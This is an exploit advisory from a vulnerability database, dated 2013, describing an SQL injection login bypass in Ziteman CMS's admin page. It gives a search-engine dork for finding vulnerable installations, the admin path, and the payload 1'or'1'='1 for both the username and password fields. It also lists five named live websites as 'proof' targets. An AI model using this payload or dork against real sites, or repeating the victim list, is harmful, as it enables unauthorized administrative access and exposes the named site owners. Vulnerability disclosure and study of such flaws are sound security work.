Ziteman Login Page SQL Injection Bypass

2013.10.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#******************************************************************************** # Exploit Title : Ziteman Login page Bypass Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://www.ziteman.dk # # Tested on: Windows 7 , Linux # # Google Dork : intext:" Powered by Ziteman CMS" # # Date: 2013/10/10 # -------------------------------------------------------------------- # Exploit : Login page bypass # # Location : [Target]/admincss/default.asp # # Username :1'or'1'='1 # # Password :1'or'1'='1 ###################### # Proof: # # http://www.ark-jr.dk/admincss/default.asp # # http://www.apservice.dk/admincss/default.asp # # http://www.cjservice.dk/admincss/default.asp # # http://www.slibecentral.dk/admincss/default.asp # # http://www.vhm.dk/admincss/default.asp # ###################### discovered by : ACC3SS ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top